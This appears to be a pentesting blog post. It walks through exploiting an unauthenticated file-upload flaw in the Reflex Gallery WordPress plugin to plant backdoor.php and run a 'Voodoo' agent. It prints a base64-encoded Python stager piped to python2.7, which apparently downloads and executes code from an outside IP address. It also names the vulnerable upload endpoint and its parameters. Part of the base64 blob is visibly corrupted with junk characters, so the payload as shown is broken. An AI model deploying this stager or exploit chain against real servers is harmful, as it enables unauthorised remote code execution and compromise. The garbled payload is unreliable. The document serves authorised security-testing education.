Initial Access via Web Application Vulnerabilities with Voodoo
In this post, we will be taking a look at a real-world pentesting scenario. In this scenario, we will identify a vulnerability in the web application we are testing and leverage that vulnerability to execute a Voodoo agent on the server.
Our Target
For this scenario, our client has requested that we examine their Wordpress blog server for vulnerabilities. They give us the IP address of the server and we get to work.
Vulnerability Scan
We’ll use the popular WPScan tool to scan the Wordpress server and help identify potential vulnerabilities. WPScan can identify the version of Wordpress that the server is running, the Wordpress users, the themes and plugins that Wordpress is using, and if those themes and plugins contain known vulnerabilities.
The following WPScan syntax will attempt to enumerate plugins with known vulnerabilities in our target Wordpress server:
The results let us know that WPScan identified a vulnerable version of the Reflex Gallery Wordpress plugin (version 3.1.3) is in use:
If we research the CVE, we come up with:
This vulnerability allows an unauthenticated attacker to upload an arbitrary file to the server. While this vulnerability may not seem significant at first, if the server allows us to upload a PHP file and then browse to it, we may be able to achieve remote code execution and compromise the server with this two step exploit.
Staging the Attack
The vulnerability we have identified allows us to upload a PHP file and then potentially access it to execute it. So first we need to craft a PHP file that will execute a Voodoo stager when accessed. First, we generate a stage from the Voodoo Web Console. It should look something like this:
echo “exec(‘aW1wb3J0IGN0eXBlcywgdXJsbGliMiwgc3NsLCBvcywgcmFuZG9tCnggPSB1cmxsaWIyLlJlcXVlc3QoJ2h0dHBzOi8vNTQuOTEuMjEyLjE0OjUwMDAvZ2VuLzFiNzMzMWFiLTkxOTktNDVkOC04NWfsdfasdfdsfdGVfdWw52ZXJpZmllZF9jb250ZXh0JykpIGVsc2UgdXJsbGliMi51cmxvcGVuKHgpCnJhbmRvbS5zZWVkKDUxMDkyNSkKc28gPSAnJy5qb2luKFtjaHIob3JkKHgpXnJhbmRvbS5yYW5kcmFuZ2UoMjU2KdaSkgZm9yIHggaW4geHMucmVhZCgpXSkKZmQgPSBjdHlwZXMuQ0RdMTChOb25lKS5zeXNjYWxsKDMxOSwgJycsIDEpCm9zLndyaXRlKGZkLCBzbykKdiA9IGN0eXBlcy5DRExMKCcvcHJvYy9zZWxmL2ZkLycgKyBzdHIoZmQpKQpvcy5jbG9zZShmZCkKdi52b28oJy91c3IvYmluL2FwdCcsIfCd1cGRhdGUnKQo=’.decode(‘base64’))” | /usr/bin/python2.7
Next, we write a PHP file using the shell_exec function to execute the stager code.
In this example, we save the file as backdoor.php.
Using curl to upload the backdoor
With our attack staged, we’re ready to leverage the vulnerability. Based on online exploit research, the AFU is accessed by POST’ing the file to wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php and providing the Year and Month parameters.
Now that we’ve successfully leveraged the vulnerability and uploaded our payload, we just need to access the file to execute the Voodoo stager. We’ll do this with the following curl command:
If we take a look at Voodoo web console, we will see that the PHP code was successfully executed and the Voodoo agent is now running on the target.
